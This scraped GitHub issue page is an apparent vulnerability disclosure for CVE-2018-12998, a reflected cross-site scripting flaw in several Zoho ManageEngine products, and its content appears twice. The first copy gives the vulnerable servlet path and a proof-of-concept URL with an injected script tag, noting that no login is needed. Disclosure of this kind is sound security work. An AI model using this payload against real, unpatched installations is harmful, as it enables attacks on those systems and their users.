Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Date: 2018/06/20 Software Link: https://www.manageengine.com/products/firewall/download.html Category: Web Application Affected Products:
Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer
Exploit Author: M3@pandas From DBAppSecurity CVE: CVE-2018-12998
com.adventnet.me.opmanager.servlet.FailOverHelperServlet
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111<script>alert(1)</script>
Notice: This vul can reproduce without login.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
=================
Zoho manageengine XSS in multiple Products
Date: 2018/06/20
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Affected Products:
Exploit Author: M3@pandas From DBAppSecurity
CVE: CVE-2018-12998
=================
Vulnerable cgi:
com.adventnet.me.opmanager.servlet.FailOverHelperServlet
=================
Proof of Concept:
Notice: This vul can reproduce without login.
The text was updated successfully, but these errors were encountered: